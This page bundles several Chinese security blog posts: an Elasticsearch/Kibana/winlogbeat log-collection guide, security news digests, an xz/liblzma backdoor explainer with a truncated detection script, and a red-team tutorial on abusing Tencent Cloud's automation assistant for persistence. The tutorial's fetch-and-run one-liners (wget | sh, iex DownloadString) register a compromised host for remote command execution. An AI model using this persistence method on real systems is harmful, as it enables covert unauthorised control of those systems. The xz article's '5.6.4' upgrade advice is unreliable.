甲方安全建设之日志采集实操干货
前言
没有永远的安全,如何在被攻击的情况下,快速响应和快速溯源分析攻击动作是个重要的话题。想要分析攻击者做了什么、怎么攻击进来的、还攻击了谁,那么日志是必不可少的一项,因此我们需要尽可能采集多的日志来进行分析攻击者的动作,甚至在攻击者刚落脚的时候就阻断攻击者。
安装Elastic+Kibana
Docker安装
这边根据官方文档:https://www.elastic.co/guide/en/elasticsearch/reference/current/docker.html 使用Docker安装了Elastic和Kibana
# 安装es
docker network create elastic
docker pull docker.elastic.co/elasticsearch/elasticsearch:8.12.1
docker run --name es01 --net elastic -p 9200:9200 -it -m 1GB docker.elastic.co/elasticsearch/elasticsearch:8.12.1
# 记录es的密码和注册kibana所需要的token
# 测试es是否正确运行
export ELASTIC_PASSWORD="es_your_password"
docker cp es01:/usr/share/elasticsearch/config/certs/http_ca.crt .
curl --cacert http_ca.crt -u elastic:$ELASTIC_PASSWORD https://localhost:9200
# 安装kibana
docker pull docker.elastic.co/kibana/kibana:8.12.1
docker run --name kib01 --net elastic -p 5601:5601 docker.elastic.co/kibana/kibana:8.12.1
会给出kibana的注册地址,访问填入上述记录的token即可。
不知道是机器性能问题还是Docker安装的问题,es容器经常会挂掉。
RPM安装
根据https://www.elastic.co/guide/en/elasticsearch/reference/current/rpm.html、https://www.elastic.co/guide/en/kibana/current/rpm.html官方文档,可以yum install安装。因为公司访问镜像源被封,因此使用上述文档中下载rpm安装:
# 安装es
wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-8.12.1-x86_64.rpm
wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-8.12.1-x86_64.rpm.sha512
shasum -a 512 -c elasticsearch-8.12.1-x86_64.rpm.sha512
sudo rpm --install elasticsearch-8.12.1-x86_64.rpm
安装kibana
wget https://artifacts.elastic.co/downloads/kibana/kibana-8.12.1-x86_64.rpm
wget https://artifacts.elastic.co/downloads/kibana/kibana-8.12.1-x86_64.rpm.sha512
shasum -a 512 -c kibana-8.12.1-x86_64.rpm.sha512
sudo rpm --install kibana-8.12.1-x86_64.rpm
依然在安装es的rpm时,会吐出es/kibana的密码:
The generated password for the elastic built-in superuser is : Fq*S7jxCjFfPu6nN8NG8
es服务可能启动不了,但是安装时会给出启动命令:
sudo systemctl daemon-reload
sudo systemctl enable elasticsearch.service
测试es启动是否正常:
export ELASTIC_PASSWORD="Fq*S7jxCjFfPu6nN8NG8"
curl --cacert /etc/elasticsearch/certs/http_ca.crt -u elastic:$ELASTIC_PASSWORD https://localhost:9200
记得改下配置文件,使其监听在0.0.0.0上面:
# /etc/elasticsearch/elasticsearch.yml
# Allow HTTP API connections from anywhere
# Connections are encrypted and require user authentication
http.host: 0.0.0.0
# Allow other nodes to join the cluster from anywhere
# Connections are encrypted and mutually authenticated
transport.host: 0.0.0.0
kibana一样,记得改下配置文件,使其监听在0.0.0.0上面:
# /etc/kibana/kibana.yml
server.host: "0.0.0.0"
安装Fleet和Elastic Agent
在Kibana上,Management->Fleet->Add Fleet Server,先安装Fleet Server,URL填写https协议,端口可以填默认的8220。装好Fleet Server后再装Elastic Agent,Fleet Server也是一个Agent,因此不能在同一台机器上同时装Fleet Server和Elastic Agent。
为了使其Elastic Agent附带Security能力,可以添加各式各样的integrations集成,如到Security->Manage->Get started->Add security integrations安装安全集成:
测试告警
注意,如果有如下错误需解决,否则会无法查阅规则:
有些规则没开,记得开下,比如我把reverse shell规则打开后:Security->Dashboards->Detection & Response可以看到一些概览:
记录Windows事件管理器日志
安装
Windows事件管理器日志不是单纯的文本,因此需要借助一些工具来帮助我们完成采集的目的。这里使用winlogbeat(https://www.elastic.co/cn/beats/winlogbeat)完成。官方提供了很详细的安装文档(https://www.elastic.co/guide/en/beats/winlogbeat/current/winlogbeat-installation-configuration.html),核心就是配置想要记录的日志类型和对外传输的方案,这里我使用的方案为:
记录的日志类型,我没改,默认就是Security、Application,甚至还有Sysmon
对外传输,我使用了传输到elastic
配置好winlogbeat.yml后可以进行测试配置文件对不对:
.\winlogbeat.exe test config -c .\winlogbeat.yml -e
下面为我的配置文件信息:
###################### Winlogbeat Configuration Example ########################
# This file is an example configuration file highlighting only the most common
# options. The winlogbeat.reference.yml file from the same directory contains
# all the supported options with more comments. You can use it as a reference.
#
# You can find the full configuration reference here:
# https://www.elastic.co/guide/en/beats/winlogbeat/index.html
# ======================== Winlogbeat specific options =========================
# event_logs specifies a list of event logs to monitor as well as any
# accompanying options. The YAML data type of event_logs is a list of
# dictionaries.
#
# The supported keys are name, id, xml_query, tags, fields, fields_under_root,
# forwarded, ignore_older, level, event_id, provider, and include_xml.
# The xml_query key requires an id and must not be used with the name,
# ignore_older, level, event_id, or provider keys. Please visit the
# documentation for the complete details of each option.
# https://go.es.io/WinlogbeatConfig
winlogbeat.event_logs:
- name: Application
ignore_older: 72h
- name: System
- name: Security
- name: Microsoft-Windows-Sysmon/Operational
- name: Windows PowerShell
event_id: 400, 403, 600, 800
- name: Microsoft-Windows-PowerShell/Operational
event_id: 4103, 4104, 4105, 4106
- name: ForwardedEvents
tags: [forwarded]
# ====================== Elasticsearch template settings =======================
setup.template.settings:
index.number_of_shards: 1
#index.codec: best_compression
#_source.enabled: false
# ================================== General ===================================
# The name of the shipper that publishes the network data. It can be used to group
# all the transactions sent by a single shipper in the web interface.
#name:
# The tags of the shipper are included in their field with each
# transaction published.
#tags: ["service-X", "web-tier"]
# Optional fields that you can specify to add additional information to the
# output.
#fields:
# env: staging
# ================================= Dashboards =================================
# These settings control loading the sample dashboards to the Kibana index. Loading
# the dashboards is disabled by default and can be enabled either by setting the
# options here or by using the `setup` command.
#setup.dashboards.enabled: false
# The URL from where to download the dashboard archive. By default, this URL
# has a value that is computed based on the Beat name and version. For released
# versions, this URL points to the dashboard archive on the artifacts.elastic.co
# website.
#setup.dashboards.url:
# =================================== Kibana ===================================
# Starting with Beats version 6.0.0, the dashboards are loaded via the Kibana API.
# This requires a Kibana endpoint configuration.
setup.kibana:
# Kibana Host
# Scheme and port can be left out and will be set to the default (http and 5601)
# In case you specify and additional path, the scheme is required: http://localhost:5601/path
# IPv6 addresses should always be defined as: https://[2001:db8::1]:5601
#host: "localhost:5601"
# Kibana Space ID
# ID of the Kibana Space into which the dashboards should be loaded. By default,
# the Default Space will be used.
#space.id:
# =============================== Elastic Cloud ================================
# These settings simplify using Winlogbeat with the Elastic Cloud (https://cloud.elastic.co/).
# The cloud.id setting overwrites the `output.elasticsearch.hosts` and
# `setup.kibana.host` options.
# You can find the `cloud.id` in the Elastic Cloud web UI.
#cloud.id:
# The cloud.auth setting overwrites the `output.elasticsearch.username` and
# `output.elasticsearch.password` settings. The format is `<user>:<pass>`.
#cloud.auth:
# ================================== Outputs ===================================
# Configure what output to use when sending the data collected by the beat.
# ---------------------------- Elasticsearch Output ----------------------------
output.elasticsearch:
# Array of hosts to connect to.
hosts: ["your_ip:9200"]
# Protocol - either `http` (default) or `https`.
#protocol: "https"
# Authentication credentials - either API key or username/password.
#api_key: "id:api_key"
username: "elastic"
password: "passwords"
# Pipeline to route events to security, sysmon, or powershell pipelines.
pipeline: "winlogbeat-%{[agent.version]}-routing"
# ------------------------------ Logstash Output -------------------------------
#output.logstash:
# The Logstash hosts
#hosts: ["localhost:5044"]
# Optional SSL. By default is off.
# List of root certificates for HTTPS server verifications
#ssl.certificate_authorities: ["/etc/pki/root/ca.pem"]
# Certificate for SSL client authentication
#ssl.certificate: "/etc/pki/client/cert.pem"
# Client Certificate Key
#ssl.key: "/etc/pki/client/cert.key"
# ================================= Processors =================================
processors:
- add_host_metadata:
when.not.contains.tags: forwarded
- add_cloud_metadata: ~
# ================================== Logging ===================================
# Sets log level. The default log level is info.
# Available log levels are: error, warning, info, debug
#logging.level: debug
# At debug level, you can selectively enable logging only for some components.
# To enable all selectors, use ["*"]. Examples of other selectors are "beat",
# "publisher", "service".
#logging.selectors: ["*"]
# ============================= X-Pack Monitoring ==============================
# Winlogbeat can export internal metrics to a central Elasticsearch monitoring
# cluster. This requires xpack monitoring to be enabled in Elasticsearch. The
# reporting is disabled by default.
# Set to true to enable the monitoring reporter.
#monitoring.enabled: false
# Sets the UUID of the Elasticsearch cluster under which monitoring data for this
# Winlogbeat instance will appear in the Stack Monitoring UI. If output.elasticsearch
# is enabled, the UUID is derived from the Elasticsearch cluster referenced by output.elasticsearch.
#monitoring.cluster_uuid:
# Uncomment to send the metrics to Elasticsearch. Most settings from the
# Elasticsearch outputs are accepted here as well.
# Note that the settings should point to your Elasticsearch *monitoring* cluster.
# Any setting that is not set is automatically inherited from the Elasticsearch
# output configuration, so if you have the Elasticsearch output configured such
# that it is pointing to your Elasticsearch monitoring cluster, you can simply
# uncomment the following line.
#monitoring.elasticsearch:
# ============================== Instrumentation ===============================
# Instrumentation support for the winlogbeat.
#instrumentation:
# Set to true to enable instrumentation of winlogbeat.
#enabled: false
# Environment in which winlogbeat is running on (eg: staging, production, etc.)
#environment: ""
# APM Server hosts to report instrumentation results to.
#hosts:
# - http://localhost:8200
# API Key for the APM Server(s).
# If api_key is set then secret_token will be ignored.
#api_key:
# Secret token for the APM Server(s).
#secret_token:
# ================================= Migration ==================================
# This allows to enable 6.7 migration aliases
#migration.6_to_7.enabled: true
数据检索
这时候,可能elastic上面搜不到数据,是因为winlogbeat使用了他自己的索引,默认为winlogbeat-version,笔者测试时,发现kibana上迟迟出现不了该索引,还以为数据传输没成功呢,因此通过如下手段进行排查,先获取es上面的索引信息:
http://your_ip:9200/_cat/indices?v
发现有类似winlogbeat的索引信息:
yellow open .ds-winlogbeat-8.12.0-2024.02.03-000001 UpWhWCpdR-2WgMVe_kiH9A 1 1 192705 0 131.1mb 131.1mb
后面尝试在kibana上创建一个新的索引即可,v7.17.12版本的kibana创建索引的过程如下:discover->选项->View Discover settings
找到“索引模式”创建一个新的索引即可:
这时候就可以检索事件管理器日志了:
网络安全日报 2024年04月07日
1、比特梵德修复其产品中的安全漏洞
https://cybersecuritynews.com/bitdefender-security-privilege-escalation-patch-now/ 网络安全公司Bitdefender修复了一个可能导致权限提升的漏洞,该漏洞会影响其产品,包括Bitdefender Internet Security、Bitdefender Antivirus Plus、Bitdefender Total Security和Bitdefender Antivirus Free。该漏洞被标记为CVE-2023-6154,CVSS评分为7.8,可能导致权限提升,使攻击者完全控制他们所针对的系统。该
2、Octopus Server存在权限提升漏洞
https://cybersecuritynews.com/octopus-server-flaw/ Octopus Server是一种用于部署、操作运行手册和开发任务的流行自动化工具,其中存在一个严重的安全漏洞。该漏洞被标记为CVE-2024-2975,可能允许攻击者提升权限。该漏洞于2024年2月20日被发现,补丁程序于2024年3月21日发布。Octopus Deploy在2024年4月2日发布了一份公告,对该漏洞进行了详细介绍。
3、宜必思酒店的自助入住机存在安全漏洞
https://www.hackread.com/ibis-budget-guest-room-codes-hacker-vulnerability/ 来自瑞士的安全团队在德国一家宜必思酒店的自助入住机中发现漏洞,该漏洞能够使办理入住后的房门密码直接显示在屏幕上,从而可能危及任何使用该自助入住机的用户安全。尽管安全人员仅在一家德国的酒店中确认了该漏洞,但他们认为该漏洞可能会影响更多的宜必思快捷酒店。安全团队称,他们已及时将该安全漏洞通报给雅高酒店集团。雅高酒店集团迅速做出了响应,并在一个月内推出了补丁程序,修复漏洞并防止房门密码进一步泄露。
4、研究人员披露攻击者利用Agent Tesla进行网络攻击活动
https://research.checkpoint.com/2024/agent-tesla-targeting-united-states-and-australia 研究人员发现近期针对美国和澳大利亚组织的Agent Tesla恶意软件攻击活动。2023年11月 7日,攻击者开始针对澳大利亚组织进行攻击活动。攻击者发起网络钓鱼活动以窃取组织的电子邮件凭据,以访问组织并开展后续的攻击活动,并执行恶意软件Agent Tesla。攻击者发送了62000封钓鱼邮件,并随后在11月8日和30日发起2轮钓鱼邮件攻击活动。经过进一步调查,研究人员追踪到两名攻击者,并在报告中列举了相关证据。
5、攻击者通过YouTube视频传播恶意软件
https://www.proofpoint.com/us/blog/threat-insight/threat-actors-deliver-malware-youtube-video-game-cracks 研究人员近期发现了多个YouTube频道,这些频道通过推广破解程序和盗版游戏内容来传播恶意软件,这些视频声称可以教用户免费下载软件或游戏,但视频描述中的链接却指向恶意软件,包括Vidar、StealC和Lumma Stealer等窃密木马。许多上传了恶意视频的账号是被窃取的合法用户账号,但研究人员发现了一些可能是攻击者创建和控制的账号,这些账号只活跃几个小时,专门用于传播恶意软件。
6、谷歌修复了Pixel手机中的两个零日漏洞
https://www.bleepingcomputer.com/news/security/google-fixes-two-pixel-zero-day-flaws-exploited-by-forensics-firms/ 谷歌修复了两个被取证公司利用的Google Pixel中的零日漏洞,这些漏洞可以让取证公司无需PIN码即可解锁手机并访问存储其中的数据。CVE-2024-29745被标记为Pixel启动加载程序中的严重信息泄露漏洞,而CVE-2024-29748被描述为Pixel固件中的严重权限提升漏洞。研究人员发现取证公司积极利用了这些漏洞,这些漏洞允许公司解锁并访问Google
7、攻击者声称窃取了美国联邦雇员的数据信息
https://cybernews.com/news/acuity-allegedly-breached-confidential-data/ 攻击者声称已经入侵了与美国国家和公共安全当局合作的技术咨询公司Acuity公司尚未针对此事发布声明,。据称,联邦特工的数据和机密文件被泄露。攻击者在一个数据泄露论坛中发布了相关消息,被盗细节包括大量信息,涉及联邦调查局、国务院、司法部和国土安全部的雇员详细信息,以及美国及其盟国之间的高度机密信息。。研究团队对数据样本进行了调查,并称虽然其中可能包含一些敏感数据,但泄露的规模被夸大了。例如,信息据称被盗取的数据库表明数据可能是测试数据。该团队称,数据转
8、研究人员披露与Pikabot恶意软件相关的攻击活动
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/distinctive-campaign-evolution-of-pikabot-malware/ Pikabot是一种恶意后门,自2023年初以来一直处于活动状态。该后面使用模块化设计,由加载机和核心模块组成。核心模块执行恶意操作,允许执行命令和从命令和控制服务器注入有效载荷。该恶意软件使用代码注入器来解密核心模块并将其注入合法进程。在2024年2月期间,研究人员发现传播Pikabot的活动发生了变化。Pikabot通过多种文件类型分发,具体取决于攻击的目标和性质。使用多种文件类型允
9、IxMetro Powerhost遭受新型勒索软件SEXi攻击
https://www.bleepingcomputer.com/news/security/hosting-firms-vmware-esxi-servers-hit-by-new-sexi-ransomware 位于智利的数据服务提供商IxMetro Powerhost遭到一个名为SEXi的新勒索组织攻击。该组织对公司的VMware ESXi服务器及其备份进行了加密。目前,托管于受影响服务器上的网站或服务都无法访问,该公司正在尝试从备份中恢复数据。在最新更新中,PowerHost向客户道歉,并警告由于备份也已被加密,可能无法恢复服务器。在尝试与攻击者谈判获取解密密钥时,该勒索组织要求每个
10、谷歌修复Chrome浏览器中的一个零日漏洞
https://securityaffairs.com/161445/hacking/google-chrome-zero-day-pwn2own.html 谷歌修复了Chrome浏览器中的一个零日漏洞,该漏洞为CVE-2024-3159,并在2024年3月的Pwn2Own黑客竞赛中被利用。CVE-2024-3159漏洞是V8 JavaScript引擎中的越界内存访问漏洞,攻击者可以通过诱骗受害者访问精心制作的HTML页面来利用此漏洞,从而访问超出内存缓冲区的数据,并触发堆损坏。利用此漏洞可能会导致敏感信息泄露或崩溃。
声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2024年04月03日
1、英国杂志社THE BIG ISSUE遭受勒索软件攻击
https://therecord.media/ransomware-gang-attacks-big-issue-street-paper 英国杂志社THE BIG ISSUE近日确认遭遇了网络攻击。该公司的信息出现在了勒索组织Qilin的暗网勒索网站上。该组织声称窃取了550GB的机密数据,其中包括商业和人事运营相关文件。该杂志社证实了此次攻击事件,并表示已经开始恢复系统运行,杂志的出版和发行并未受到此事件影响。
2、游艇销售商MarineMax确认其数据泄露
https://www.bleepingcomputer.com/news/security/yacht-retailer-marinemax-discloses-data-breach-after-cyberattack/ 游艇零售商MarineMax表示,攻击者在3月份的网络攻击中,入侵其系统后窃取了员工和客户数据。MarineMax表示,经调查,该公司已确定一个网络犯罪组织访问了我们零售业务相关的信息环境的一部分,该组织窃取了少量数据,其中包括一些客户和员工信息,包含个人身份信息。虽然该公司没有指明攻击者是谁,但名为Rhysida的勒索组织声称对该攻击事件负责,目前正在暗网上以15个比
3、新加坡宝兴珠宝公司确认数据泄露事件
https://www.channelnewsasia.com/singapore/poh-heng-jewellery-data-breach-customer-information-leaked-4231691 新加坡宝兴珠宝(Poh Heng)通知顾客其数据库在3月25日发生泄露事件,未经授权的访问可能泄露了会员的个人信息,这可能包括用户的姓名、电话号码、电子邮件和居住地址、会员 ID、以及出生日期和居住国家/地区。该公司确认没有密码和付款信息泄露。
4、英国通信工人工会确认遭受网络攻击
https://www.theregister.com/2024/03/25/cwu_security_incident/ 英国通信工人工会(CWU)确认其遭受网络攻击,并且导致电子右键系统停止运行,攻击的全部范围仍在评估中。一些CWU会员数据存储在遭受攻击的IT系统中,目前该工会不确定这些个人数据是否泄露。虽然目前尚不清楚该事件是否泄露了任何数据,但考虑到CWU 18.5万名的会员人数,任何可能的泄露都可能导致严重的后果。
5、WP-Members 插件中的安全漏洞导致脚本注入
https://www.securityweek.com/security-flaw-in-wp-members-plugin-leads-to-script-injection/ WP-Members 会员插件中的跨站点脚本漏洞可能允许攻击者将脚本注入用户配置文件页面。
6、Chrome 将通过设备绑定会话凭证来打击 Cookie 盗窃行为
https://www.securityweek.com/chrome-to-fight-cookie-theft-with-device-bound-session-credentials/ 谷歌正在为 Chrome 带来新功能,将浏览器会话绑定到设备并保护用户免遭 cookie 盗窃。
7、谷歌将清除数十亿浏览器记录以解决Chrome 隐私案件
https://www.securityweek.com/google-to-purge-billions-of-files-containing-personal-data-in-settlement-of-chrome-privacy-case/ 谷歌同意清除数十亿条记录,其中包含从使用其 Chrome 网络浏览器的超过 1.36 亿人收集的个人信息,作为指控其非法监控的诉讼和解的一部分。
8、PandaBuy 数据泄露据称影响了超过 130 万客户
https://securityaffairs.com/161355/data-breach/pandabuy-data-breach.html 威胁行为者声称 PandaBuy 在线购物平台遭到黑客攻击,并泄露了超过 130 万客户的数据。
9、微软和 OpenAI 计划建立数据中心和 ‘Stargate’ 超级计算机
https://cybernews.com/news/microsoft-openai-100-billion-data-center-stargate-supercomputer/ 据消息人士称,微软-OpenAI 合资公司的成本将是目前运行的最大数据中心的 100 倍,并包含 "数百万个 GPU"。
10、针对安卓系统的Vultur银行恶意软件冒充McAfee安全应用
https://www.anquanke.com/post/id/295180 研究人员分析的最新版本的Vultur恶意软件保留了旧版本的几个关键功能,例如屏幕记录,键盘记录以及通过AlphaVNC和ngrok进行远程访问,允许攻击者实时监视和控制。
声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
腾讯云(CVM)托管进行权限维持
前言
刚好看到一个师傅分享了一个阿里云ECS实战攻防,然后想到了同样利用腾讯云CVM的托管亦可实现在实战攻防中的权限维持。
简介
腾讯云自动化助手(TencentCloud Automation Tools,TAT)是一个原生运维部署工具,它可以在不登录或输入密码的情况下,实现对云服务器 CVM 和轻量应用服务器 Lighthouse 的自动化远程操作。该工具支持批量执行命令,包括 Shell、PowerShell 及 Python 等,能够完成一系列自动化运维任务,如运行自动化脚本、轮询进程、安装/卸载软件、更新应用及安装补丁等。这样的便利性使得企业可以更加高效地管理和维护其云服务器和轻量应用服务器,从而提高其云计算服务的可靠性和安全性。
应用场景
上传并运行自动化运维脚本
执行常见操作任务
运行已保存的脚本
托管实例
控制台->自动化助手->托管实例
权限维持
使用默认数值即可,默认值的阈值设定和阿里云的一致
实例创建成功后,可在客户端执行命令
Linux命令
sudo wget -qO - https://xxxxxxxxx.cos.accelerate.myqcloud.com/tat_agent/tat_agent_register.sh | sudo sh -s -- ap-guangzhou b3ec8e08-d73a-40d8-83c4-7308101b00b6 be131e221d1749a6860a4e3a6e1b37415f1c867f2646436abb67e0998fa24883
Windows
iex "& { $((New-Object System.Net.WebClient).DownloadString('https://xxxxxxxxx.cos.accelerate.myqcloud.com/tat_agent/tat_agent_register.ps1')) } ap-guangzhou b3ec8e08-d73a-40d8-83c4-7308101b00b6 be131e221d1749a6860a4e3a6e1b37415f1c867f2646436abb67e0998fa24883"
执行命令后发现实例可托管成功,但是是离线状态
宿主服务器安装自动化助手客户端
root@ubuntu:/home/ubuntu# sudo wget -qO - https://xxxxxxxxx.cos-internal.accelerate.tencentcos.cn/tat_agent/tat_agent_installer.sh | sudo sh
查看探针状态
ps -ef | grep tat_agent
命令后,查看进程状态。如果进程不存在
/usr/local/qcloud/tat_agent/tat_agent // 启动进程
其实这里的客户端的探针类似于监听状态,一直在线,托管服务器执行命令上线
执行命令
执行结果
执行时长48秒
文件上传
文件上传权限等均可自定义。
小结
可以明显发现执行时效性不是很流畅,但是优点儿在于:
托管权限维持稳定
文件上传方便以及文件权限方便
网络安全日报 2024年04月02日
1、研究人员发现100多个针对机器学习库的恶意Python软件包
https://www.mend.io/blog/over-100-malicious-packages-target-popular-ml-pypi-libraries 研究人员近期发现100多个针对流行机器学习 (ML) 库的恶意软件包,其中包括PyTorch、Matplotlib 和Selenium等库。攻击者利用拼写错误的方式,通过故意拼写错误的域名或软件包名称来诱导开发人员下载这些软件包的恶意版本,例如“Matplotltib”、“selennim”和“PyToich”。这些恶意软件包使用Fernet加密机制来解密其恶意脚本。解密后,脚本会根据其指令获取进一步的攻击阶段。研究人员分
2、研究人员披露新的Linux提权漏洞
https://www.theregister.com/2024/03/29/linux_kernel_flaw 安全研究人员近期发现一个新的Linux提权漏洞,影响了Linux 5.14至6.6.14之间的内核版本。该漏洞影响Debian、Ubuntu、Red Hat、Fedora等Linux发行版。研究人员本周发布了关于该漏洞的详细技术报告,并表示他们提供的漏洞利用程序在内核6.4.16上的成功率为99.4%。该漏洞被标记为CVE-2024-1086,CVSS评分为7.8(满分 10)。漏洞已于1月底修复,相关安全补丁正在陆续发布。
3、思科修复其IOS和IOS XE中的多个安全漏洞
https://securityaffairs.com/161181/security/cisco-ios-and-ios-xe-software-flaws.html 思科本周发布了安全补丁,用于修复多个IOS和IOS XE软件漏洞。未经身份验证的攻击者可以利用这些漏洞进行拒绝服务 (DoS) 攻击。严重的安全漏洞包括CVE-2024-20311(CVSS评分8.6)、CVE-2024-20314(CVSS评分8.6)、CVE-2024-20307 - CVE-2024-20308(CVSS评分8.6) 、CVE-2024-20259(CVSS评分8.6)、CVE-2024-20303(C
4、美国联合健康集团承认其患者数据泄露
https://www.healthcareinfosecurity.com/unitedhealth-admits-patient-data-was-taken-in-mega-attack-a-24728 联合健康集团公开承认,其Change Healthcare部门在遭受网络攻击后数据遭到窃取。联合健康集团在3月27日发布的最新事件更新中表示,他们正在优先审查受影响的数据,该公司认为这些数据可能包含健康信息、个人身份信息、索赔和资格信息或财务信息。到目前为止,联合健康集团尚未发现任何被盗数据被发布在暗网中。由于Change Healthcare部门的系统遭到攻击导致难以访问,因此审查上
5、思科称攻击者正针对防火墙设备RAVPN服务进行密码喷射攻击
https://www.bleepingcomputer.com/news/security/cisco-warns-of-password-spraying-attacks-targeting-vpn-services/ 近期思科为客户提供了一组建议,以缓解针对思科防火墙设备上配置的远程访问VPN(RAVPN)服务的密码喷射攻击。该公司表示,这些攻击还针对其他远程访问VPN服务。攻击者会尝试使用多个帐户使用相同的密码以尝试登录,从而进行密码喷射攻击。思科提供了此活动的入侵指标 (IoC),以帮助用户检测和阻止攻击。
6、卡巴斯基报告称12%的人曾在伴侣手机上安装跟踪软件
https://www.freebuf.com/articles/paper/395070.html 《跟踪软件状态》(The State of Stalkerware)是卡巴斯基的一份年度报告,旨在更好地了解全球受这种数字跟踪形式影响的人数。卡巴斯基最新数据揭示,2023年,全球共有31031名个人用户受到跟踪软件的影响,较2022年(29312名受影响用户)有所增加。这种趋势突出了全球范围内的数字跟踪状态,并表明这个问题不会自行消失。全球23%的人表示,他们曾遭遇过来自约会对象的某种形式的在线跟踪。
7、微软 SaaS 版 Copilot for Security正式上线
https://www.freebuf.com/articles/396283.html 4月1日,微软正式上线订阅模式(SaaS)的人工智能安全服务——Microsoft Copilot for Security。据微软发布的信息,Copilot for Security 经过迭代升级,是迄今为止全球网络安全行业首个独立的生成式 AI 解决方案,可帮助安全和 IT 专业人员增强其技能、进行更多协作、查看更多内容并更快地做出响应。Copilot for Security 基于 GPT-4 模型和微软专有安全大模型。Copilot for Security 采用与微软 Azure 绑定的“按使
8、NIST 成立新联盟来运营其国家漏洞数据库
https://www.anquanke.com/post/id/295128 美国国家标准与技术研究院 (NIST) 正式宣布将把世界上使用最广泛的软件漏洞存储库的部分管理工作移交给行业联盟。
9、美国国防部发布《2024 年国防工业基础网络安全战略》
https://www.secrss.com/articles/64817 美国防部 3 月 28 日正式发布《2024 年国防工业基础(DIB)网络安全战略》,旨在加强美国防部与 DIB 合作,进一步协调和统筹资源,以提高美国国防供应商和生产商的网络安全。
10、OWASP 披露成员数据泄露事件
https://securityaffairs.com/161371/data-breach/owasp-data-breach.html OWASP 基金会披露了由于旧 Wiki Web 服务器配置错误而影响部分成员的数据泄露事件。
声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
liblzma/xz被植入后门,过程堪比谍战片!
事件概述
xz是一种几乎存在于所有Linux发行版中的通用数据压缩格式。从5.6.0版本开始,在xz的上游tarball包中被发现了恶意代码,通过一系列复杂的混淆手段,liblzma的构建过程从伪装成测试文件的源代码中提取出预构建的目标文件,然后用它来修改liblzma代码中的特定函数。这导致生成了一个被修改过的liblzma库,任何链接此库的软件都可能使用它,从而拦截并修改与此库的数据交互。
3月29日,微软PostgreSQL开发人员Andres Freund在调试SSH性能问题时,在开源安全邮件列表中发帖称,他在XZ软件包中发现了一个涉及混淆恶意代码的供应链攻击。据Freund和RedHat称,Git版XZ中没有恶意代码,只有完整下载包中存在。但是这个代码的提交人两年前就加入了项目维护,暂时不能确定之前的版本有没有问题。
xz 5.6.0和5.6.1版本库中存在的恶意注入只包含在tarball下载包中。Git发行版中缺少触发恶意代码构建的M4宏。注入期间构建时使用的第二阶段工件存在于Git存储库中,以防存在恶意的M4宏。如果不合并到构建中,第二阶段文件是无害的。在发现者的演示中,发现它干扰了OpenSSH守护进程。虽然OpenSSH没有直接链接到liblzma库,但它以一种使其暴露于恶意软件的方式与systemd通信,而systemd链接到了liblzma。恶意构建会通过systemd干扰sshd的认证。在一定的情况下,这种干扰有可能使恶意行为体破坏ssh认证,并远程未经授权访问整个系统。
截至日前(3月30日),暂未观察到利用此后门代码的行为。
影响的系统范围
xz和liblzma 5.6.0~5.6.1 版本,可能包括的发行版 / 包管理系统有:
Fedora 41 / Fedora Rawhide
Debian Sid
Alpine Edge
x64 架构的 homebrew
滚动更新的发行版,包括 Arch Linux / OpenSUSE Tumbleweed
如果你的系统使用systemd 启动 OpenSSH 服务,你的 SSH 认证过程可能被攻击。非x86-64 架构的系统不受影响。
if ! (echo "$build" | grep -Eq "^x86_64" > /dev/null 2>&1) && (echo "$build" | grep -Eq "linux-gnuquot; > /dev/null 2>&1);then
你可以在命令行输入xz --version来检查xz 版本,如果输出为5.6.0或5.6.1 ,说明你的xz-utils已被植入后门。
$ xz --version
xz (XZ Utils) 5.6.1
liblzma 5.6.1
目前迹象表明,后门作者有选择性的针对linux 发行版下手。但这个liblzma 可不只Linux上用。比如目前流行的iOS越狱环境,大部分tweak 包还是以.deb 格式发行,比较新的版本就用到了lzma 作为压缩。除此之外,近期有在 macOS上使用brew 安装过xz 这个包也受影响,暂时不能证明有恶意行为:
过程精彩如谍战片
这可能是最大胆的信息安全事件之一。“最大胆”表明这起事件在手法、规模、影响等方面都超出了我们以往对于攻击的认知,可能是一个全新的安全威胁模型。
"最大胆"一词还隐含着对攻击者心理和技术实力的一种评价。做出如此"大胆"之举的,肯定是心理素质极强、技术水平极高、准备极其缜密的黑客团伙,绝非一般的脚本小子可以企及。
1、一个不知名团伙注意到OpenSSH依赖一个名为liblzma(xz)的小众开源压缩库。
2、他们虚构了一个名为"Jia Tan"的开发者身份,从2021年10月开始为xz项目积极做贡献,逐渐获得信任,并最终接管了维护工作。
3、2024年2月,"Jia"在构建脚本中引入了一个复杂隐蔽的后门,该后门似乎针对OpenSSH的身份验证前加密功能,可能添加了"主密钥"让攻击者随意访问受影响服务器。
4、 "Jia"联系Linux发行版维护者,试图让带后门的xz库被打包分发给用户,直到微软员工Andres Freund因调查SSH延迟问题发现了此事。
这可能是一次有外国政府支持的职业行动,而非业余爱好者所为。更根本的是,xz后门不是一个技术问题,可能也不能单靠技术来解决。归根结底,这是一个反情报挑战——完全属于政府和少数拥有生态系统范围监控能力的商业实体的能力范畴。这尤其包括谷歌和微软。事实上,这里有一个有趣的想法:也许他们已经知道了很长一段时间。我们能分辨出这是为了掩盖"手段和来源"而精心设计的披露,还是偶然发现的吗?
检测和解决方法
解决方法:
降级到5.6.0以下版本
更新到官方最新版5.6.4
检测脚本:
#! /bin/bash
set -eu
# find path to liblzma used by sshd
path="$(ldd $(which sshd) | grep liblzma | grep -o '/[^ ]*')"
# does it even exist?
if [ "$path" == "" ]
then
echo probably not vulnerable
exit
fi
# check for function signature
if hexdump -ve '1/1 "%.2x"' "$path" | grep -q f30f1efa554889f54c89ce5389fb81e7000000804883ec28488954241848894c2410
then
echo probably vulnerable
else
echo probably not vulnerable
